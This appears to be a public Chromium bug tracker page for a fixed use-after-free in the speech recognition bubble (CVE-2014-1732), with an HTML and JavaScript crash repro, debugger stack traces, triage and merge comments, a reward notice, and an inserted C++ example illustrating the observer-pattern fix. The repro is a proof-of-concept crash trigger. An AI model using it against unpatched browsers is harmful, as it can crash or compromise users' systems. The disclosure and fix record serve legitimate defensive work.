
Issue metadata

Status: Fixed
Closed: Apr 2014
OS: Windows
Pri: 1
Type: Bug-Security
Labels: wip




Issue 352851: Security: UaF in SpeechRecognitionBubbleImpl::~SpeechRecognitionBubbleImpl

Reported by chromium...@gmail.com, Mar 15 2014

Issue description

VERSION
Chrome Version : 35.0.1892.2 canary
Operating System: Windows XP

REPRO FILE:

<input onclick="setTimeout('test()',500)" x-webkit-speech />
<script>
function test()
{
  if (document.documentElement.webkitRequestFullScreen) {
    document.documentElement.webkitRequestFullScreen();
  }
  document.addEventListener("webkitfullscreenchange", function () { history.go(-1) }, true);
}
</script>
<script defer=defer>
if (history.length == 1) {
  setTimeout('window.location = document.location + "?new"', 10);
}
</script>


Crash State: 
012fa78 02fa4583 chrome_1c50000!`anonymous namespace'::SpeechRecognitionBubbleImpl::~SpeechRecognitionBubbleImpl+0x1c [c:\b\build\slave\win\build\src\chrome\browser\ui\views\speech_recognition_bubble_views.cc @ 362]
0012fa84 025bc2a2 chrome_1c50000!`anonymous namespace'::SpeechRecognitionBubbleImpl::`scalar deleting destructor'+0xb
0012fac4 01cfdd91 chrome_1c50000!speech::SpeechRecognitionBubbleController::ProcessRequestInUiThread+0xab [c:\b\build\slave\win\build\src\chrome\browser\speech\speech_recognition_bubble_controller.cc @ 199]
0012fad4 01cb0f9c chrome_1c50000!base::internal::Invoker<2,base::internal::BindState<base::internal::RunnableAdapter<bool (__thiscall history::ShortcutsDatabase::*)(std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &)>,void __cdecl(history::ShortcutsDatabase *,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &),void __cdecl(history::ShortcutsDatabase *,std::basic_string<char,std::char_traits<char>,std::allocator<char> >)>,void __cdecl(history::ShortcutsDatabase *,std::basic_string<char,std::char_traits<char>,std::allocator<char> > const &)>::Run+0x16 [c:\b\build\slave\win\build\src\base\bind_internal.h @ 1253]
0012fb6c 01caff4d chrome_1c50000!base::MessageLoop::RunTask+0x29d [c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc @ 451]
0012fcb0 01d2c55b chrome_1c50000!base::MessageLoop::DoWork+0x367 [c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc @ 576]
0012fcdc 01cafa12 chrome_1c50000!base::MessagePumpForUI::DoRunLoop+0x5f [c:\b\build\slave\win\build\src\base\message_loop\message_pump_win.cc @ 219]
0012fd84 01ecf92d chrome_1c50000!base::MessageLoop::StartHistogrammer+0xa7 [c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc @ 545]
0012fd98 01ecf8f5 chrome_1c50000!content::BrowserMainLoop::RunMainMessageLoopParts+0x2d [c:\b\build\slave\win\build\src\content\browser\browser_main_loop.cc @ 723]
0012fda8 01c705d4 chrome_1c50000!content::BrowserMainRunnerImpl::Run+0x13 [c:\b\build\slave\win\build\src\content\browser\browser_main_runner.cc @ 118]
0012fdd8 01c703bb chrome_1c50000!content::BrowserMain+0x83 [c:\b\build\slave\win\build\src\content\browser\browser_main.cc @ 26]
0012fdec 01c70337 chrome_1c50000!content::RunNamedProcessTypeMain+0x61 [c:\b\build\slave\win\build\src\content\app\content_main_runner.cc @ 466]
0012fe50 01c5c89a chrome_1c50000!content::ContentMainRunnerImpl::Run+0x64 [c:\b\build\slave\win\build\src\content\app\content_main_runner.cc @ 779]
0012fe60 01c5c2d4 chrome_1c50000!content::ContentMain+0x23 [c:\b\build\slave\win\build\src\content\app\content_main.cc @ 19]
0012fea0 00427c91 chrome_1c50000!ChromeMain+0x3e [c:\b\build\slave\win\build\src\chrome\app\chrome_main.cc @ 49]
0012ff30 004276bc chrome!MainDllLoader::Launch+0x15f [c:\b\build\slave\win\build\src\chrome\app\client_util.cc @ 315]
0012ff74 00449ac5 chrome!wWinMain+0x50 [c:\b\build\slave\win\build\src\chrome\app\chrome_exe_main_win.cc @ 103]
 

Comment 1 by chromium...@gmail.com, Mar 15 2014

Speech API Crash Video.avi
3.2 MB Download

Comment 2 by infe...@chromium.org, Mar 17 2014

What are the repro steps? Does it need user interaction like a mouse click, etc.?

Comment 3 by chromium...@gmail.com, Mar 17 2014

inferno@ There are no steps to repro, just click on the Speech.

Comment 4 by chromium...@gmail.com, Mar 17 2014

This crash can take several tries to repro.

Comment 5 by ClusterFuzz, Mar 18 2014

Project Member
Labels: Cr-Blink-Speech Owner-Triage Untriaged-1
Owner: tommyw@chromium.org
Status: Assigned
tommyw@: Can you please take a look or find someone else to own it.

- Your friendly ClusterFuzz

Comment 6 by ClusterFuzz, Mar 18 2014

Project Member
Labels: Missing_Severity-1 Missing_Impact-1

Comment 7 by rsesek@chromium.org, Mar 18 2014

khalil: Based on the version in which you reported this, I don't think this was fixed by bug 330660.

Were you able to reproduce this on either the stable or beta versions of Chrome (which include fixes for that bug, too)?

Comment 8 by chromium...@gmail.com, Mar 18 2014

rsesek@: Yes, I can reproduce this bug on the latest version of canary (35.0.1897.2) and stable (33.0.1750.154), but only on my slow machine (Windows XP).

Comment 9 by chromium...@gmail.com, Mar 18 2014

I've recorded a demo showing how I repro this crash on canary http://youtu.be/yR3i805Irmw

Comment 10 by chromium...@gmail.com, Mar 19 2014

eax=f9559fe6 ebx=00000000 ecx=06aa6700 edx=035bf840 esi=05e24660 edi=01105ea0
eip=0290f59a esp=0012f97c ebp=0012f988 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
chrome_1c30000!`anonymous namespace'::SpeechRecognitionBubbleImpl::~SpeechRecognitionBubbleImpl+0x1c:
0290f59a ff5074          call    dword ptr [eax+74h]  ds:0023:f955a05a=????????
0:000> k
  *** Stack trace for last set context - .thread/.cxr resets it
ChildEBP RetAddr  
0012f97c 0290f969 chrome_1c30000!`anonymous namespace'::SpeechRecognitionBubbleImpl::~SpeechRecognitionBubbleImpl+0x1c [c:\b\build\slave\win\build\src\chrome\browser\ui\views\speech_recognition_bubble_views.cc @ 351]
0012f988 022e98a7 chrome_1c30000!`anonymous namespace'::SpeechRecognitionBubbleImpl::`scalar deleting destructor'+0xb
0012f9c4 01cc78f6 chrome_1c30000!speech::SpeechRecognitionBubbleController::ProcessRequestInUiThread+0xa8 [c:\b\build\slave\win\build\src\chrome\browser\speech\speech_recognition_bubble_controller.cc @ 200]
0012f9d4 01c88985 chrome_1c30000!base::internal::Invoker<2,base::internal::BindState<base::internal::RunnableAdapter<void (__thiscall invalidation::InvalidationClientImpl::*)(invalidation::ObjectId const &)>,void __cdecl(invalidation::InvalidationClientImpl *,invalidation::ObjectId const &),void __cdecl(base::internal::UnretainedWrapper<invalidation::InvalidationClientImpl>,invalidation::ObjectId)>,void __cdecl(invalidation::InvalidationClientImpl *,invalidation::ObjectId const &)>::Run+0x16 [c:\b\build\slave\win\build\src\base\bind_internal.h @ 1253]
0012faa0 01c88029 chrome_1c30000!base::MessageLoop::RunTask+0x56d [c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc @ 513]
0012fbf0 01cf536d chrome_1c30000!base::MessageLoop::DoWork+0x301 [c:\b\build\slave\win\build\src\base\message_loop\message_loop.cc @ 638]
0012fc1c 01ca4c53 chrome_1c30000!base::MessagePumpForUI::DoRunLoop+0x5c [c:\b\build\slave\win\build\src\base\message_loop\message_pump_win.cc @ 219]
0012fcc0 01ec26e4 chrome_1c30000!PrefService::SetUserPrefValue+0xd9 [c:\b\build\slave\win\build\src\base\prefs\pref_service.cc @ 455]
0012fcd4 01ec26ae chrome_1c30000!content::BrowserMainLoop::RunMainMessageLoopParts+0x2d [c:\b\build\slave\win\build\src\content\browser\browser_main_loop.cc @ 730]
0012fce4 01c4ea8a chrome_1c30000!content::BrowserMainRunnerImpl::Run+0x13 [c:\b\build\slave\win\build\src\content\browser\browser_main_runner.cc @ 123]
0012fd1c 01c4e862 chrome_1c30000!content::BrowserMain+0x99 [c:\b\build\slave\win\build\src\content\browser\browser_main.cc @ 26]
0012fd30 01c4e7e4 chrome_1c30000!content::RunNamedProcessTypeMain+0x5d [c:\b\build\slave\win\build\src\content\app\content_main_runner.cc @ 472]
0012fd9c 01c3aa9b chrome_1c30000!content::ContentMainRunnerImpl::Run+0x85 [c:\b\build\slave\win\build\src\content\app\content_main_runner.cc @ 791]
0012fdac 01c3a4e0 chrome_1c30000!content::ContentMain+0x29 [c:\b\build\slave\win\build\src\content\app\content_main.cc @ 35]
0012fde4 00428677 chrome_1c30000!ChromeMain+0x2b [c:\b\build\slave\win\build\src\chrome\app\chrome_main.cc @ 34]
0012fe84 004288d3 chrome!MainDllLoader::Launch+0x161 [c:\b\build\slave\win\build\src\chrome\app\client_util.cc @ 301]
0012fee8 00428956 chrome!`anonymous namespace'::RunChrome+0xd7 [c:\b\build\slave\win\build\src\chrome\app\chrome_exe_main_win.cc @ 68]
0012ff30 00447e9f chrome!wWinMain+0x6c [c:\b\build\slave\win\build\src\chrome\app\chrome_exe_main_win.cc @ 139]
0012ffc0 7c817067 chrome!__tmainCRTStartup+0x11a [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 275]

Comment 11 by rsesek@chromium.org, Mar 19 2014

Labels: -Untriaged-1 -Missing_Severity-1 -Missing_Impact-1 Security_Severity-Medium Security_Impact-Beta Security_Impact-Stable OS-Windows
Thanks. I was not able to reproduce this on OS X, FWIW. This bug is similar in nature to bug 330660 but does require a small amount of user interaction (you have to click the speech mic icon), so I'm going to do an initial Severity of Medium.

Comment 12 by ClusterFuzz, Mar 20 2014

Project Member
Labels: Pri-1

Comment 13 by ClusterFuzz, Mar 26 2014

Project Member
Labels: Nag
tommyw@: Uh oh! This issue is still open and hasn't been updated in the last 7 days. Since this is a serious security vulnerability, we want to make sure progress is happening. Can you update the bug with current status, and what, if anything, is blocking?

If you are not the right Owner for this bug, please find someone else to own it as soon as possible and remove yourself as Owner.

If the issue is already fixed or you are unable to reproduce it, please close the bug. (And thanks for fixing the bug!)

These nags can be disabled by adding a 'WIP' label and an optional codereview link.

- Your friendly ClusterFuzz

Comment 14 by tommyw@chromium.org, Mar 26 2014

Labels: -Nag WIP

Comment 15 by bugdroid1@chromium.org, Apr 4 2014

Project Member
------------------------------------------------------------------
r261737 | tommyw@chromium.org | 2014-04-04T13:48:25.464526Z

Changed paths:
   M http://src.chromium.org/viewvc/chrome/trunk/src/chrome/browser/ui/views/speech_recognition_bubble_views.cc?r1=261737&r2=261736&pathrev=261737

Fixing a lifetime issue for Speech Recognition Bubble
It seems that on a slow XP machine the view can be deleted before the
Impl. Fixed by a simple observer pattern.

BUG= 352851 

Review URL: https://codereview.chromium.org/213153002
-----------------------------------------------------------------
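
The fix description above says the view can be deleted before the Impl on a slow machine and that this was "fixed by a simple observer pattern"; the crash state in the report shows ~SpeechRecognitionBubbleImpl making an indirect call through an unmapped address, which is what dereferencing a freed view looks like. The C++ below is an added illustration, not Chromium's code and not the r261737 patch: a toolkit-owned view, a naive Impl that keeps a raw pointer (the bug shape, which is only safe when the Impl dies first), and an Impl that registers as an observer so the view clears the Impl's pointer if the view is destroyed first. All class and function names (BubbleView, NaiveImpl, SafeImpl, ViewObserver) are invented for the example.

```cpp
// Added example (not Chromium code): modelling "the view can be deleted before
// the Impl" and the observer-pattern fix. All names here are hypothetical.
#include <algorithm>
#include <cstdio>
#include <vector>

// Observer interface: a view announces that it is about to go away.
class ViewObserver {
 public:
  virtual ~ViewObserver() = default;
  virtual void OnViewDestroyed() = 0;
};

// Stand-in for the toolkit-owned bubble view. The window system may delete it
// at any moment (e.g. when the parent window is torn down), independently of
// the Impl that created it.
class BubbleView {
 public:
  ~BubbleView() {
    // Notify observers while this object is still valid, so they drop their
    // pointers. Iterate over a copy in case an observer unregisters itself.
    std::vector<ViewObserver*> snapshot(observers_);
    for (ViewObserver* o : snapshot) o->OnViewDestroyed();
  }
  void AddObserver(ViewObserver* o) { observers_.push_back(o); }
  void RemoveObserver(ViewObserver* o) {
    observers_.erase(std::remove(observers_.begin(), observers_.end(), o),
                     observers_.end());
  }
  void Hide() { ++hide_calls; }
  int hide_calls = 0;  // instrumentation for the scenarios below

 private:
  std::vector<ViewObserver*> observers_;
};

// Bug shape: a raw pointer with no way to learn that the view died.
// Correct only while the Impl is always destroyed first; if the view goes
// first, ~NaiveImpl dereferences freed memory.
class NaiveImpl {
 public:
  explicit NaiveImpl(BubbleView* v) : view_(v) {}
  ~NaiveImpl() { view_->Hide(); }  // dangling if the view was deleted earlier

 private:
  BubbleView* view_;
};

// Hardened shape: the Impl observes the view, nulls its pointer when the view
// is destroyed first, and unregisters itself when it is destroyed first.
class SafeImpl : public ViewObserver {
 public:
  explicit SafeImpl(BubbleView* v) : view_(v) { view_->AddObserver(this); }
  ~SafeImpl() override {
    if (view_) {
      view_->RemoveObserver(this);  // we go first: stop the later callback
      view_->Hide();                // view is still alive, safe to touch
    }
  }
  void OnViewDestroyed() override { view_ = nullptr; }
  bool HasView() const { return view_ != nullptr; }

 private:
  BubbleView* view_;
};

// Scenario 1: the "slow XP" ordering, view deleted before the Impl. Returns
// true if the Impl released its pointer before its own destructor runs.
bool ViewDiesFirstIsSafe() {
  BubbleView* view = new BubbleView();
  SafeImpl impl(view);
  delete view;             // toolkit tears the view down early
  return !impl.HasView();  // ~SafeImpl will now skip the view entirely
}

// Scenario 2: normal ordering, Impl destroyed first. Returns how many Hide()
// calls the still-live view received (expected: exactly one).
int ImplDiesFirstHidesOnce() {
  BubbleView view;
  {
    SafeImpl impl(&view);
  }  // ~SafeImpl unregisters, then hides the live view
  return view.hide_calls;
}

// Scenario 3: the naive class in the only ordering it survives.
int NaiveNormalOrderHidesOnce() {
  BubbleView view;
  {
    NaiveImpl impl(&view);
  }
  return view.hide_calls;
}

int main() {
  std::printf("view first, safe impl: %s\n", ViewDiesFirstIsSafe() ? "ok" : "BAD");
  std::printf("impl first, safe impl: hide calls = %d\n", ImplDiesFirstHidesOnce());
  std::printf("impl first, naive impl: hide calls = %d\n", NaiveNormalOrderHidesOnce());
  return 0;
}
```

The design point is that neither object owns the other, so neither destructor may assume the other is alive; the observer callback is what turns an unknown ordering into a known state. Running the naive class with the view deleted first is deliberately not a scenario here, since that is undefined behaviour rather than a result to assert on.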

Comment 16 by infe...@chromium.org, Apr 4 2014

Status: Fixed

Comment 17 by ClusterFuzz, Apr 4 2014

Project Member
Labels: -Restrict-View-SecurityTeam Merge-Triage Restrict-View-SecurityNotify M-35 M-34
Adding Merge-Triage label for tracking purposes.

Once your fix had sufficient bake time (on canary, dev as appropriate), please nominate your fix for merge by adding the Merge-Requested label.

When your merge is approved by the release manager, please start merging with higher milestone label first. Make sure to re-request merge for every milestone in the label list. You can get branch information on omahaproxy.appspot.com.

- Your friendly ClusterFuzz

Comment 18 by chromium...@gmail.com, Apr 8 2014

Is this report qualified for a reward?

Comment 19 by infe...@chromium.org, Apr 8 2014

Labels: reward-topanel
Chromium.Khalil@, we automatically add reward-topanel label when we are near a release. This is a recently fixed bug, please be patient.

Comment 20 by timwillis@chromium.org, Apr 17 2014

Labels: -Merge-Triage Merge-Approved Merge-Requested
Merge-Approved for M34 (via dxie@)

Merge-Requested for M35.

Comment 21 by infe...@chromium.org, Apr 17 2014

Labels: -Merge-Approved merge-merged-1847 Release-1-M34
merged to m34 in r264644

Comment 22 by bugdroid1@chromium.org, Apr 17 2014

Project Member
------------------------------------------------------------------
r264644 | inferno@chromium.org | 2014-04-17T21:32:45.778846Z

Changed paths:
   M http://src.chromium.org/viewvc/chrome/branches/1847/src/chrome/browser/ui/views/speech_recognition_bubble_views.cc?r1=264644&r2=264643&pathrev=264644

Merge 261737 "Fixing a lifetime issue for Speech Recognition Bubble"

> Fixing a lifetime issue for Speech Recognition Bubble
> It seems that on a slow XP machine the view can be deleted before the
> Impl. Fixed by a simple observer pattern.
> 
> BUG= 352851 
> 
> Review URL: https://codereview.chromium.org/213153002

TBR=tommyw@chromium.org

Review URL: https://codereview.chromium.org/240223010
-----------------------------------------------------------------

Comment 23 by timwillis@chromium.org, Apr 17 2014

Merge-Requested for M35.

Comment 24 by kareng@google.com, Apr 21 2014

let's bake a bit more.

Comment 25 by kareng@google.com, Apr 21 2014

Labels: -Merge-Requested Merge-Approved
ah nm, I saw the wrong merge.

Comment 26 by timwillis@chromium.org, Apr 22 2014

Tommy - please merge into M35 (branch 1916).

Comment 27 by kenrb@chromium.org, Apr 24 2014

Issue 348430 has been merged into this issue.

Comment 28 by infe...@chromium.org, Apr 25 2014

Labels: -Merge-Approved Merge-Merged
We forgot to remove m34 label.

Dev not responding to merge request; I merged to m35 in r266126.

Comment 29 by bugdroid1@chromium.org, Apr 25 2014

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/3e1316a8675b9e6e1047698d32da41ea8642a9d5

commit 3e1316a8675b9e6e1047698d32da41ea8642a9d5
Author: inferno@chromium.org <inferno@chromium.org@0039d316-1c4b-4281-b951-d872f2087c98>
Date: Fri Apr 25 04:03:48 2014 +0000

Merge 261737 "Fixing a lifetime issue for Speech Recognition Bubble"

> Fixing a lifetime issue for Speech Recognition Bubble
> It seems that on a slow XP machine the view can be deleted before the
> Impl. Fixed by a simple observer pattern.
> 
> BUG= 352851 
> 
> Review URL: https://codereview.chromium.org/213153002

TBR=tommyw@chromium.org

Review URL: https://codereview.chromium.org/254773002

git-svn-id: svn://svn.chromium.org/chrome/branches/1916/src@266126 0039d316-1c4b-4281-b951-d872f2087c98

Comment 30 by bugdroid1@chromium.org, Apr 25 2014

Project Member
Labels: merge-merged-1916
------------------------------------------------------------------
r266126 | inferno@chromium.org | 2014-04-25T04:03:48.174336Z

Changed paths:
   M http://src.chromium.org/viewvc/chrome/branches/1916/src/chrome/browser/ui/views/speech_recognition_bubble_views.cc?r1=266126&r2=266125&pathrev=266126

Merge 261737 "Fixing a lifetime issue for Speech Recognition Bubble"

> Fixing a lifetime issue for Speech Recognition Bubble
> It seems that on a slow XP machine the view can be deleted before the
> Impl. Fixed by a simple observer pattern.
> 
> BUG= 352851 
> 
> Review URL: https://codereview.chromium.org/213153002

TBR=tommyw@chromium.org

Review URL: https://codereview.chromium.org/254773002
-----------------------------------------------------------------

Comment 31 by timwillis@chromium.org, Apr 26 2014

Labels: -reward-topanel reward-1000 reward-unpaid CVE-2014-1732
Congrats - $1000 for this one.

Comment 32 by chromium...@gmail.com, Apr 26 2014

Oh sounds good, thanks!

Comment 33 by ClusterFuzz, Jul 11 2014

Project Member
Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.

Comment 34 by timwillis@chromium.org, Jul 22 2014

Labels: -reward-unpaid reward-inprocess

Comment 35 by timwillis@chromium.org, Sep 6 2014

Labels: -reward-inprocess
Processing via our e-payment system can take a few weeks, but reward should be on its way to you. Thanks again for your help!

Comment 36 Deleted

Comment 37 by ClusterFuzz, Feb 2 2016

Project Member
Labels: -Security_Impact-Beta

Comment 38 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 39 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 40 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 41 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
